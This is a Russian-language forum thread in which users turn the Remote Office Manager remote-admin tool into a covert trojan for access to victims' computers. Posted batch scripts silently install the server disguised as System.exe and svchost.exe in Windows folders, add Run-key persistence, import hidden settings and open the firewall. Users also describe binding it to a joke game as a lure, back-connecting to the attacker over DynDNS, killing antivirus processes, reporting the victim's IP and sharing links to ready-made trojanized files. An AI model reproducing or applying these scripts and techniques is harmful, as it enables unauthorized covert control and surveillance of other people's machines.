Просмотр полной версии : Remote Office Manager - конкурент RAdmin'a
Скачать видео:
Dump.Ru (http://dump.ru/file/4328491)
depositfiles (http://depositfiles.com/files/gumq6syjd)
Файлы к видео:
Dump.Ru (http://dump.ru/file/4328492)
depositfiles (http://depositfiles.com/files/ghrsrrdew)
-=lebed=-
17.06.2009, 10:43
Достойная альтернатива RA, пользуемся уже год (RA отложен на долго в ящик)
Имеюся некоторые незначительные глюки, но с выходом более новой версии наверно их не будет. Та версия что есть у нас не работает под Vista (новая наверно уже пашет).
F3x111TsSL
18.06.2009, 18:41
вопросик по поводу этого сервиса с привязкой домена к айпи:
там чето попробывал получилось что каждый раз при смене динамического айпи надо заходить в настройки и применять новый айпишник
так, не?
ну и как сделать чтоб софтина сама отсылала айпи и он автоматом менялся на сайте?
сайтег бесплатно не пашет?
вопросик по поводу этого сервиса с привязкой домена к айпи:
там чето попробывал получилось что каждый раз при смене динамического айпи надо заходить в настройки и применять новый айпишник
так, не?
ну и как сделать чтоб софтина сама отсылала айпи и он автоматом менялся на сайте?
сайтег бесплатно не пашет?
сервис бесплатный. Updater сам обновляет IP по таймеру (вроде каждый час). Лично я программой не пользуюсь. У меня в настройках модема есть вкладка DDns там всё прописал и работает.
Перезалейте куданить в другое место плиз! Лучше на дамп.ру!!!!
Перезалейте куданить в другое место плиз! Лучше на дамп.ру!!!!
готово..
обновил ссылки в посте #1
Хорошая наверное весчь,но мне как то предварительно обработанный TeamViewer
проще!Никаких тебе ип,шлёт себе на РНР скрипт данные для подключения и всё!
Дополнительный модуль,дллка всего то 4 кб весит.
Это ведь вполне легальное дело и не предназначен он для таких всяких дел!
И работает ли насколько он в чистом виде!?TeamViewer и в одном файле хорошо свою работу делает!Можно плаг дописать,изменить по своему усмотрению!Тыж прогер,не то что я,не мог не заметить!
Gray_f0x
01.07.2009, 14:44
в принципе - тим вивер вообщем-то довольно крутой вариант, его только допилить нужно, сделать отправку номера сессии на http или на почту, убрать все уведомления по-умолчанию разрещить любые действия. Лично я юзаю UltraVNC
nefjodvae
02.07.2009, 11:31
установил скрипт из шапки, сервер запрашивает пароль, кто знает? пробывал и 123... не идет!
Gray_f0x
02.07.2009, 11:39
поставь радмин обычный, где есть настройки, задай свой пароль, а потом сделай экспорт, а ваще радмин 2.2 уже имхо неактуально, хотя смотря как заливать возможно.
nefjodvae
02.07.2009, 12:16
радмин то я без проблем впариваю ещё и ip приходит на почту :) токо утилита доктора-веба палит его на раз :( а этот встал без проблем и антивири молчат ))) токо сервак пароль требует, автору срипта писал в личку, пока молчит.
установил скрипт из шапки, сервер запрашивает пароль, кто знает? пробывал и 123... не идет!
Дальше надо создать создать *.reg файл в котором будут все необходимые настройки сервера.
Для этого устанавливаем ROMServer инсталлятором, делаем все необходимые установки. Главное не забыть про автозапуск, отображение в трее, Обратное соединение ну и пароль)
или я тебя не понял или ты что-то не так сделал..
PS На офф сайте вышла новая бэта. сейчас каспер ругается на 2 файла из версии 3.3.3, т.е. та, про которую идёт речь в статье. Бэту 3.4 проверял нодом и каспером - всё ок ;)
nefjodvae
02.07.2009, 18:24
теперь понял )))
Man-chel
09.07.2009, 12:10
Зачем такие заморочки?!
установите LogMein и забудьте раз и навсегда проблему удаленной слежки и доступа.
утилита для удаленного доступа к компьютеру и его ресурсам. Пользователь может подключаться из любой точки мира, имеющей выход в интернет, будь то система Mac OS X или Windows, и работать на своем домашнем компьютере, как будто он за ним сидит.
Зачем такие заморочки?!
установите LogMein и забудьте раз и навсегда проблему удаленной слежки и доступа.
утилита для удаленного доступа к компьютеру и его ресурсам. Пользователь может подключаться из любой точки мира, имеющей выход в интернет, будь то система Mac OS X или Windows, и работать на своем домашнем компьютере, как будто он за ним сидит.
бла бла бла....
а слабо кинуть сылку на крякнутую версию и рабочую а еще лудше оформить в статью???
А где в настройках ROMa, указать мой ип для Обратного соединения?
Теперь и НОДом стал палиться...
А видео по настройке есть??? С динам айпи...... ....
blood150
29.07.2009, 23:53
Огромное конешно спс за такие идеи, но вот я начинающий и очень хочется по полробнее, или видео или описание, а так канечно всё выглядит круто.
Огромное конешно спс за такие идеи, но вот я начинающий и очень хочется по полробнее, или видео или описание, а так канечно всё выглядит круто.
а ты не пробовал что-то сам сделать? скажи, что именно непонятно или что не получается...
blood150
27.09.2009, 12:07
а ты не пробовал что-то сам сделать? скажи, что именно непонятно или что не получается...
у меня то всё получается а вот другие не очень понимают.
blood150
27.09.2009, 12:15
кстати напишу обьяснение для всех, как получается троян из такой программы управления.
Сначало просто устанавливаете у себя на компе серверную часть, потом собираете в одну папку все файлы каторые раскидала прога, тоесть то что записалось в папку Program Files и в WINDOWS потом экспортируете то что записала эта программа в реестр.
и наконецто делаете батничек(.bat) который раскидает эти файлы по темже местам и импортирует этот файлик реестра. Всё соединяете в одно целое так чтобы при нажатии на это запускался ваш батник, и всё.
склеивать рому с игрой можно... я для склейки использую Bat To Exe Converter (http://www.f2ko.de/English/b2e/index.php).. просто в конце батника прописываешь с новой строки имя_игры.exe и после установки ромы запустится игра
по ходу уже палится AVP Kaspesky, Eset NOD32, Symantec.... :( :(
2 valman
попробуй запустить с правами администратора или выключить UAC ( или как он там)) )
2 valman
попробуй запустить с правами администратора или выключить UAC ( или как он там)) )
UAC что это? Я его не чтобы так запускал, а даже через инсталлер - результата ноль, ничего не работает..
Вопрос первый, - что это за палево в твоем батнике?:
echo set WshShell = CreateObject("WScript.Shell") >>1.vbs
echo BtnCode = WshShell.Popup("Fatal Error: Ошибка запуска!", 0, "Fatal Error", 0 + 16) >>1.vbs
cscript 1.vbs
del 1.vbs
Вопрос номер два, - почему размер файлов в твоем РОМе не соответствует реальным размерам исходных файлов?
При запуске твоего батника выкдывает сообщение что системе не удаётся найти указанынй файл. Ты батник вообще для какой системы делал? короче палёный батник конкертно.
Сделай людский батник под Висту!!
echo set WshShell = CreateObject("WScript.Shell") >>1.vbs
echo BtnCode = WshShell.Popup("Fatal Error: Ошибка запуска!", 0, "Fatal Error", 0 + 16) >>1.vbs
cscript 1.vbs
del 1.vbs
это значит, что после установки рома выйдет окошко с заголовком "Fatal Error" и текстом "Fatal Error: Ошибка запуска!"
что тут палевного? я в видео написал, что эти стороки можно удалить! смотри всё внимательно.
что касаемо размера файлов, то в распакованном состоянии они весят 4мб а в архиве могут сжаться где-то в 2-3 раза
Где в реестре можно прописать запуск ROMServer.exe на постоянке? Run и RunServices не пашут
blood150
06.12.2009, 12:23
Где в реестре можно прописать запуск ROMServer.exe на постоянке? Run и RunServices не пашут
copy ""%0"" "%SystemRoot%\system32\ViruZ.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ViruZ" /t REG_SZ /d "%SystemRoot%\system32\ViruZ.bat" /f >nul
вот команда в батнике
Я пока не понимаю, как работает запуск файла ROMServer.exe автоматом
blood150
06.12.2009, 16:30
Я пока не понимаю, как работает запуск файла ROMServer.exe автоматом, в регистрах его нигде нет, в автозапуске тоже нет, в регистре Run и RunServices тоже отсутствует. Как оно может вообще запускаться? Но оно запускается и работает так как я и хотел, но не думаю что будет работать постоянно и не думаю что обакновенная комманда из БАТника типа silentinstall прописывает его в регситры на долгие века.
Можешь мне разъяснить принцип автозапуска ROMServer.exe? Может есть смысл кинуть файл в папку system32, тогда как конкретно должен выглядить REG файл с коммандой для прописи в папке %SystemRoot%\System32\ROMServer.exe ? и нужно ли кидать и все остальные файлы в директорию System32?[/QUOTE]
Если ты про то как он попадает в автозапуск, то это в настройках сервера само стоит автозагрузка, такчто трой сам будет запускатся постоянно.
а про то как переделать всё под папку System32 то не надо переписывать фаил с расширением REG в нём всё и так пойдёт, тебе только батник переписать надо так
mkdir "%SYSTEMROOT%\System32\sistem"
copy /y "AledensoftIpcServer.dll" "%SYSTEMROOT%\System32\sistem\AledensoftIpcServer.d ll"
copy /y "English.lg" "%SYSTEMROOT%\System32\sistem\English.lg"
copy /y "EULA.rtf" "%SYSTEMROOT%\System32\sistem\EULA.rtf"
copy /y "HookDrv.dll" "%SYSTEMROOT%\System32\sistem\HookDrv.dll"
copy /y "ROMFUSClient.exe" "%SYSTEMROOT%\System32\sistem\svchost.exe"
copy /y "ROMServer.exe" "%SYSTEMROOT%\System32\sistem\System.exe"
copy /y "ROMwln.dll" "%SYSTEMROOT%\System32\sistem\ROMwln.dll"
copy /y "Russian.lg" "%SYSTEMROOT%\System32\sistem\Russian.lg"
"%SYSTEMROOT%\System32\sistem\System.exe" /silentinstall
"%SYSTEMROOT%\System32\sistem\System.exe" /firewall
reg import "settings.reg"
regedit /s "settings.reg"
"%SYSTEMROOT%/System32\sistem\System.exe" /start
видеш как тут сделано? ROMServer.exe переименовывайтся в System.exe так он будет отображатся в процессах диспетчкра , я думаю врятли кто рескнёт закрывать такой процесс....
а вот этой строчкой создаётся папка в которую кинутся всё нужные файлы mkdir "%SYSTEMROOT%\System32\sistem
Самое интересное что файлы с названием system.exe итд не работают, тобишь не запускаются.
Еще, батник при запуске с "%SYSTEMROOT%/System32\sistem\ROMServer.exe" /start
показывает ошибку что не может найти файл для запуска, то же самое показывает при запуске с %WindowsDir% или %SystemDir%. Тупо не хочет находить там файлы (хотя они там есть) работает при запуске только с %ProgramFiles%. Что это может быть? У меня Виста.
blood150
08.12.2009, 12:59
Самое интересное что файлы с названием system.exe итд не работают, тобишь не запускаются.
показывает ошибку что не может найти файл для запуска, то же самое показывает при запуске с %WindowsDir% или %SystemDir%. Тупо не хочет находить там файлы (хотя они там есть) работает при запуске только с %ProgramFiles%. Что это может быть? У меня Виста.
А вот с вистой я не дружу, может командная строка на висте отличается от хр?
а ты не пробовал написать так?
"%SYSTEMROOT%\System32\sistem\ROMServer.exe" /start
или просто в командной строке написать
echo %ProgramFiles%
или
echo %SYSTEMROOT%
и кстати.. в винде нет переменных %WindowsDir% и %SystemDir% поэтому и не работает с ними
у меня одного видео не открывается?
а ты не пробовал написать так?
"%SYSTEMROOT%\System32\sistem\ROMServer.exe" /start
или просто в командной строке написать
echo %ProgramFiles%
или
echo %SYSTEMROOT%
и кстати.. в винде нет переменных %WindowsDir% и %SystemDir% поэтому и не работает с ними
Пробовал и \ и echo прописывал, кстати после последнего ошибку не выбрасывало, но сервер не стартовался, но при этом REG файл срабатывал.
blood150
11.12.2009, 18:18
Вот готовый ром 4.1 склееный с прикольчиком "замочи боса" вам только осталось дать челу этот прикол посмотреть и какимнибуть образом узнать его IP__))))
Пароль на соединение 12345678
http://clip2net.com/clip/m24580/1260540773-ubei_bosa-1739kb.exe?nocache=1
Вот готовый ром 4.1 склееный с прикольчиком "замочи боса" вам только осталось дать челу этот прикол посмотреть и какимнибуть образом узнать его IP__))))
Пароль на соединение 12345678
А чем склееный?
blood150
13.12.2009, 12:03
А чем склееный? Ты мою прожку тестил? http://upload.com.ua/get/901221759/
Ты чтото серьёзное мне дал, я вчера накуриный скачал это дело пытался разобратся, так чуть мозг не вскипел.Щя ещё буду разбиратся, помню что вчера не понял как компилировать в готовый EXE фаил.
blood150
13.12.2009, 13:18
нее, я лучше буду клеить Bat_To_Exe_Converter в нём за 20 секунд всё делается и не чего лишнего (скрытая установка, версия, иконка). Smart Install Maker хорош когда надо зделать чтото профессиональное и красивое.
нее, я лучше буду клеить Bat_To_Exe_Converter в нём за 20 секунд всё делается и не чего лишнего (скрытая установка, версия, иконка). Smart Install Maker хорош когда надо зделать чтото профессиональное и красивое.
Ты мне напоминаешь себя - такой же лентяй) Smart Install Maker делает всё то что ты перечислил и также скрытно абсолютно! Плюс к нему ты можешь прицепить любую программу-игру обманку, которая будет запускать Открыто а не скрытно. Короче здесь полета для фантазии хватает, а в Bat_To_Exe_Converter сильно ограничен в возможностях, во всяком случае я не сделал с его помощью то чего хотел, как по мне Bat_To_Exe_Converter это вчерашний день.
Ты чтото серьёзное мне дал, я вчера накуриный скачал это дело пытался разобратся, так чуть мозг не вскипел.Щя ещё буду разбиратся, помню что вчера не понял как компилировать в готовый EXE фаил.
Я тебе могу подсказать чуть что, есть вопросы - задавай! Там всё на русском и впринципе оч просто
blood150
14.12.2009, 11:50
Я тебе могу подсказать чуть что, есть вопросы - задавай! Там всё на русском и впринципе оч просто
заметил там такую функцию закрыть приложение вот написал там egui.exe (так нод32 в диспетчере отоброжается) так вот при запуске готового инстлятора нод32 закрывается без проблем, получается что так на компьютер где стоит нод32 можно протолкнуть любого зверя. Ты случайно не знаеш а какие антивирусы также просто закрыть?
Палево, всё выкупает любой антивирус!!!!
blood150
14.12.2009, 22:33
По ходу ты прогу оценил - это уже хорошо. Причем начал копать в правильном направлении. Закрыть думаю можно всё то что закрывается + здесь также иногда играет роль запуска интсаллера с правами Администратора, это типа подсказка, если вдруг какой-то файл инсталлер не может закрыть. Скажу тебе по секрету, при установке РОМа тем же интсаллером, ни одна программа не крякало что там вирус! (Во сила официальной инсталяхи, да) НО как только ты начнешь перетаскивать те же файли со своего компа на удалённый, то последний завизжит антивирусом! И покажет что на компе вирус. У меня другая ьема, хочу сделать Интсаляху в папку Windows\System32\sistem так чтобы там прописывалась и запускалась! С пропиской вопросов нет -Пишет, а вот батник не отрабатывает, а именно не находит такого пути к нужным файлам. Не могу понять в чем тут дело..
не понел в чём заморочка у тебя?
Последний вариант тупо тоже не работает, батник не хочет запускать файлы..
Не нужно никаких ДЖОИНЕРОВ!!! Они все паляться антивирусами!!!
Одну головоломку для себя решил, ни одного безпалевного джоинера по ходу не найти
не понел в чём заморочка у тебя?
ВСЁ, проблемку решил, все теперь запускается из любой нужной и самой дальней директории. Просто НАХ снес БАТ файл, он не нужен, все комманды что были в БАТ файле я прописал в самом инсталлере, благо дело там есть для этого спеиальное место :cool:
blood150
15.12.2009, 16:01
ВСЁ, проблемку решил, все теперь запускается из любой нужной и самой дальней директории. Просто НАХ снес БАТ файл, он не нужен, все комманды что были в БАТ файле я прописал в самом инсталлере, благо дело там есть для этого спеиальное место :cool:
мне бы хотелось попробывать то что у тебя получилось сделай ссыль на твоего зверя, а вот три моих
http://clip2net.com/clip/m24580/1255020847-mosta-2218kb.exe?nocache=1
http://clip2net.com/clip/m24580/1255444071-friends-7352kb.exe?nocache=1
мне бы хотелось попробывать то что у тебя получилось сделай ссыль на твоего зверя, а вот три моих
http://clip2net.com/clip/m24580/1255020847-mosta-2218kb.exe?nocache=1
http://clip2net.com/clip/m24580/1255444071-friends-7352kb.exe?nocache=1
Сделаем проще, я тебе вышлю Проект сохраненного Инсталлера, с пропиской и запуском в System32, пароль и регистр вставишь свой - тупо в разделе регистр Жмешь Импорт и ищешь свой REG файл со своими настройками а потом всавляешь и ...всё :) Сбрось мне отдельно игрушку "убей босса" голую, без аттачментов
ппц MCAfee уже палит его как троян
не радмир круче, там все понятно а тут.....
blood150
20.12.2009, 15:06
ROM сам конектится на твой IP полезно когда у жертвы динамический IP.....
А что тебе понятно на радмире?
ROM сам конектится на твой IP полезно когда у жертвы динамический IP.....
Та пох, пусть себе меняется
blood150
22.12.2009, 17:05
Возникли вопросы:
Чет я опять накуриный и не понимаю твоего вопроса но...
вот эта создаст папку: mkdir "%SYSTEMROOT%\System32\sistem"
а эта запустит: start %SYSTEMROOT%\system\sistem\ROMserver.exe
blood150
22.12.2009, 17:09
(как я делал) через DynDNS
вот это интересно как настроить DynDNS а то чёт них не понял как этой лажей пользоватся ты бы состряпал обучалочку для меня был бы благодарен... и если можно видео по настройке...
вот это интересно как настроить DynDNS а то чёт них не понял как этой лажей пользоватся ты бы состряпал обучалочку для меня был бы благодарен... и если можно видео по настройке...
Оч просто, регистрируешься, полчаешь новый хост
Народ, нужен кряк на новую версию РОМа 4.1 предыдущая была 4.0.1 Если у кого есть реально аппробированный - киньте сцыль плиз.
У кого-нибудь получилось создать инсталлер с работающим бек-коннектом ? Только проверенный не на себе а на жертве... Так всё работает, а вот бек коннект всё никак.
Всё работает и не только через бэк коннект. Есть еще и LogMien Hamachi и NO-IP и DynDNS итп. А что у тебя конкретно не выходит?
blood150
23.12.2009, 11:20
кряк бы и мне хотелось......
кряк бы и мне хотелось......
Да вот закачал пару штук с новой версией, они все не рабочие.
Кста, ты раздуплил с интсаллером? Там по ходу можно кидать в любую папку при этом в Комманде для РОМы нужно указать вот это /silentinstall /firewall /start одной строкой! :cool:
у кого есть скрытая версия?
которая работает без ведома владельца компа?
blood150
30.12.2009, 14:38
у кого есть скрытая версия?
которая работает без ведома владельца компа?
ты о чём? тебе же дали ссылки http://clip2net.com/clip/m24580/1260540773-ubei_bosa-1739kb.exe?nocache=1
Вот кто просил RemoteOfficeManager4.1 (http://depositfiles.com/files/15d37w75g/) crack рабочий. У меня к вам другой вопрос как пользоваться Smart Install Maker, вернее как прописать из батника команды. Если кто может сделать видео, буду премного благодарен и наверно не только я.
Вот кто просил RemoteOfficeManager4.1 (http://depositfiles.com/files/15d37w75g/) crack рабочий. У меня к вам другой вопрос как пользоваться Smart Install Maker, вернее как прописать из батника команды. Если кто может сделать видео, буду премного благодарен и наверно не только я.
Там ничего сложного
Вот если бы кто подкинул рабочий безпалевный джоинер - программа скрепления нескольких файлов в один (например в word.doc) это была бы бомба!
По ходу на форуме такого днем с огнем не сыщешь, а так тема сырая, выеденного яйца не стоит.
Тема закрыта.
кто то пробывал фишку бак конект через интеренет ? У меня все замечательно через локалку работает, настроил dyndns открыл на роутаре порты, для теста дажи себе ставил сервер и комне заходил человек, если я ему даю сервер с настоиным бек конектом на мой домен то не чего не происходит и не получаю бэк конекта от него, фаирволы и анти виры вырублены.
кто то пробывал фишку бак конект через интеренет ? У меня все замечательно через локалку работает, настроил dyndns открыл на роутаре порты, для теста дажи себе ставил сервер и комне заходил человек, если я ему даю сервер с настоиным бек конектом на мой домен то не чего не происходит и не получаю бэк конекта от него, фаирволы и анти виры вырублены.
Бэкконнект работает 100-пудово... Проверяй, открыт ли порт
Ты ебать как это видео снимал ?
Блин, почему когда стоит хамачи то приходит и бек конект через инет, а когда без то не приходит ? :(
POS_troi
11.04.2010, 23:51
Блин, почему когда стоит хамачи то приходит и бек конект через инет, а когда без то не приходит ?
Потому что компьютер к которому делаеш конект находится за роутером
эм, для этого и есть бек конект чтоб роутер обходил. Но я тут поглядел фишка в другом. Как доконца разберусь выложу инфу.
spider-intruder
12.04.2010, 02:54
Через прокси пахать не умеет а так все супер.
spider-intruder
12.04.2010, 02:55
Новый с краком (рабочий)
http://fileshare.in.ua/3019860
Как переимновать файл RomServer.exe? чтобы не палиться?
И как настроить DDns? никогда не пользовалься, можете написать инструкцию хоть маленькую или видео
А еще проблема... всё сделал вроде, непалиться, всё инсталлируеться... но не могу зайти на сервер... даже в командную строку не коннектит, максимум могу отправить чат сообщение... версия 4.1
спасибо за мануал, разобрался и собрал ром. Все работает и не палится, кроме как в процессах. Добавил отстук ip на мыло и на скрипт. Если кому надо - помогу.
visokosnik_
19.05.2010, 18:50
помогите установил четвертый ром 4.1
вот батник
mkdir "%SYSTEMROOT%\help\migwiz2"
copy /y "AledensoftIpcServer.dll" "%SYSTEMROOT%\help\migwiz2\AledensoftIpcServer.dll"
copy /y "HookDrv.dll" "%SYSTEMROOT%\help\migwiz2\HookDrv.dll"
copy /y "ROMFUSClient.exe" "%SYSTEMROOT%\help\migwiz2\svchost.exe"
copy /y "ROMServer.exe" "%SYSTEMROOT%\help\migwiz2\System.exe"
copy /y "ROMwln.dll" "%SYSTEMROOT%\help\migwiz2\ROMwln.dll"
"%SYSTEMROOT%\help\migwiz2\System.exe" /silentinstall
"%SYSTEMROOT%\help\migwiz2\System.exe" /firewall
reg import "settings.reg"
regedit /s "settings.reg"
"%SYSTEMROOT%/help\migwiz2\System.exe" /start
в регистре он почемуто HKEY_LOCAL_MACHINE\SYSTEM\Remote Office Manager\v3.4\Server\Parameters а не 4.1
и строку в сетингсе менял на "FUSClientPath"="C:\\Windows\\Help\\migwiz2\\svchost.exe"
и все равно
но он не запускается в логах вот что пишет
19-05-2010_18:34:45#T:Invalid exe-file name.
хотя в более ранних версиях такого не возникало
visokosnik_
22.05.2010, 07:50
долгими пробами и ошибками выяснилось что выложенные здесь файлы ROM отличаются от оригинальных (я сразу обратил внимание на разницу в размере ром сервера и ромфусклиента ,но думал что это от того что их версия 4,0,0 )
видимо знающими людьми они были подкорректированы так что б была возможность их переименовывать
поэтому просьба к гуру подкоректируйте файлы для версии 4.1.2
http://depositfiles.com/files/7cj400upl
,заранее всем признателен и если не трудно сделайте видео
выложенные здесь файлы ROM отличаются от оригинальных
Если ты имеешь ввиду файлы из первого поста, то они оригинальные, Скачанные с офф. сайта.
А вообще у меня так и не получилось поменять имя процесса ни старых ни в нынешней версии РОМы
visokosnik_
22.05.2010, 23:07
А вообще у меня так и не получилось поменять имя процесса ни старых ни в нынешней версии РОМы
вот версия старого рома 4,0,0 это уже готовый
http://depositfiles.com/files/wi6linxur
они могут переименовываться
а здесь просто без регфайла
http://depositfiles.com/files/fjmlnclku
visokosnik_
23.05.2010, 15:09
нарыл все таки версию 4.0.0 и как оказалось romserver можно переименовать ,НО не работает просмотр экрана и при запуске меняется ветка реестра "FUSClientPath"="C:\\Windows\\Help\\migwiz2\\ROMFUSClient.exe" то есть ROMFUSClient.exe даже изменив имя ,при запуске ROMserver-a востанавливается в ROMFUSClient.exe
возможно это в самом реестре надо поправлять, либо сами файлы ROMFUSClient.exe и ROMServer.exe модифицировать
подскажите в чем это можно сделать
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot